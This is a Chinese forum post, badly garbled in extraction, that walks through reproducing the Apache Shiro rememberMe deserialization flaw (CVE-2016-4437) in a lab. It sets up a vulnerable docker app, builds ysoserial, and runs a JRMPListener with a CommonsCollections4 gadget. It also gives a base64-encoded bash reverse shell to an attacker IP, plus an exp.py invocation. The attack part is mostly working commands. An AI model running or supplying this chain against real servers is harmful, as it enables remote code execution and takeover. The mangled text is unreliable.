搜索

[27042] 2020-07-15_漏洞复现CVE-2016-4437ApacheShiro反序列化

文档创建者:s7ckTeam
浏览次数:41
最后更新:2025-01-19
2020-07-15_漏洞复现CVE-2016-4437ApacheShiro反序列化 : C V E - 2 0 1 6 - 4 4 3 7   A p a c h e   S h i r o         2 0 2 0 - 0 7 - 1 5   #   , 6 A p a c h e   S h i r o J a v a A p a c h e   S h i r o R e m e m b e r M e 访 访 s h i r o 使 C o o k i e R e m e m b e r M e M a n a g e r r e m e m b e r M e c o o k i e C o o k i e R e m e m b e r M e M a n a e r c o o k i e r e m e m b e r M e A E S B a s e 6 4 c o o k i e 1 r e m e m b e r M e   c o o k i e 2 b a s e 6 4   3 A E S 4 A E S K e y ( ) A E S A E S b a s e 6 4 c o o k i e r e m e m b e r M e S h i r o r e m e m b e r M e R C E r e m e m b e r M e A E S s h i r o A p a c h e   S h i r o   < =   1 . 2 . 4   1 C e n t o s 7     1 9 2 . 1 6 8 . 1 . 1 0 0       2 K a l i           1 9 2 . 1 6 8 . 1 . 1 0 3       ( 1 ) d o c k e r A p a c h e   S h i r o d o c k e r d o c k e r d o c k e r 访 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 : 8 0 8 1 /   d o c k e r   p u l l   m e d i c e a n / v u l a p p s : s _ s h i r o _ 1 s y s t e m c t l   r e s t a r t   d o c k e r d o c k e r   r u n   - d   - p   8 0 8 1 : 8 0 8 0   m e d i c e a n / v u l a p p s : s _ s h i r o _ 1
( 2 ) j a v a v i m   / e t c / p r o f i l e     ( 3 ) m v n m k d i r   / u s r / l o c a l / j a v a / t a r   - z x v f   j d k - 8 u 2 5 1 - l i n u x - x 6 4 . t a r . g z   - C   / u s r / l o c a l / j a v a / e x p o r t   J A V A _ H O M E = / u s r / l o c a l / j a v a / j d k 1 . 8 . 0 _ 2 5 1 e x p o r t   J R E _ H O M E = $ { J A V A _ H O M E } / j r e e x p o r t   C L A S S P A T H = . : $ { J A V A _ H O M E } / l i b : $ { J R E _ H O M E } / l i b e x p o r t   P A T H = $ { J A V A _ H O M E } / b i n : $ P A T H s o u r c e   / e t c / p r o f i l e       # 使 l n   - s   / u s r / l o c a l / j a v a / j d k 1 . 8 . 0 _ 2 5 1 / b i n / j a v a   / u s r / b i n / j a v a       # j a v a   - v e r s i o n         # w g e t   h t t p : / / m i r r o r s . h u s t . e d u . c n / a p a c h e / m a v e n / m a v e n - 3 / 3 . 3 . 9 / b i n a r i e s / a p a c h e - m a v e n - 3 . 3 . 9 - b i n . t a r . g z t a r   - x v f     a p a c h e - m a v e n - 3 . 3 . 9 - b i n . t a r . g z
m v   - f   a p a c h e - m a v e n - 3 . 3 . 9   / u s r / l o c a l /       v i m   / e t c / p r o f i l e     ( 4 ) y s o s e r i a l     / y s o s e r i a l / t a r g e t / y s o s e r i a l - 0 . 0 . 6 - S N A P S H O T - a l l . j a r 访 U R L b u r p s h i r o S e t - C o o k i e r e m e m b e r M e = d e l e t e M e e x p o r t   M A V E N _ H O M E = / u s r / l o c a l / a p a c h e - m a v e n - 3 . 3 . 9 e x p o r t   P A T H = $ { P A T H } : $ { M A V E N _ H O M E } / b i n s o u r c e   / e t c / p r o f i l e       # m v n   - v         # g i t   c l o n e   h t t p s : / / g i t h u b . c o m / f r o h o f f / y s o s e r i a l . g i t c d   y s o s e r i a l m v n   p a c k a g e   - D   s k i p T e s t s
R e m e m b e r   M e 1 0 9 9 T i p s p a y l o a d s / J R M P C l i e n t e x p l o i t / J R M P L i s t e n e r 使 J R M P L i s t e n e r y s o s e r i a l     J R M P   S e r v e r     S e r v e r S e r v e r J R M P C l i e n t   p a y l o a d p a y l o a d s / J R M P C l i e n t p a y l o a d e x p l o i t / J R M P L i s t e n e r   使     b a s h 使 J a v a   R u n t i m e b a s h : h t t p : / / w w w . j a c k s o n - t . c a / r u n t i m e - e x e c - p a y l o a d s . h t m l 使 b a s h e x e c ( ) " > " s h e l l 使   S t r i n g T o k e n i z e r   l s   " M y   D i r e c t o r y " l s   ' " M y '   ' D i r e c t o r y " ' s h e l l b a s h b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 1 . 1 0 3 / 6 6 6 6   0 > & 1 j a v a   - c p   y s o s e r i a l - 0 . 0 . 6 - S N A P S H O T - a l l . j a r   y s o s e r i a l . e x p l o i t . J R M P L i s t e n e r   1 0 9 9   C o m m o n s C o l l e c t i o n s 4   " b a s h "
使 e x p . p y p a y l o a d ( p y t h o n 2 ) 6 6 6 6 s h e l l b u r p c o o k i e p a y l o a d j a v a n c j a v a   - c p   y s o s e r i a l - 0 . 0 . 6 - S N A P S H O T - a l l . j a r   y s o s e r i a l . e x p l o i t . J R M P L i s t e n e r   1 0 9 9   C o m m o n s C o l l e c t i o n s 4   " b a s h   - c   { e c h o , Y m F z a C A t a S A + J i A v Z G V 2 L 3 R j c C 8 x O T I u M T Y 4 L j E u M T A z L z Y 2 N j Y g M D 4 m M Q = = } | { b a s e 6 4 , - d } | { b a s h , - i } " p y t h o n 2   e x p . p y   1 9 2 . 1 6 8 . 1 . 1 0 3 : 1 0 9 9       / / i p j a v a
s h e l l s h e l l d o c k e r C O N T A I N E R   I D     使 v p s j a v a s h e l l s h e l l   s h i r o 1 . 2 . 5 使 A E S h t t p s : / / p a n . b a i d u . c o m / s / 1 Q D 2 H _ F p m q U 0 h K 7 u c D C J 8 s g 4 f u y
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理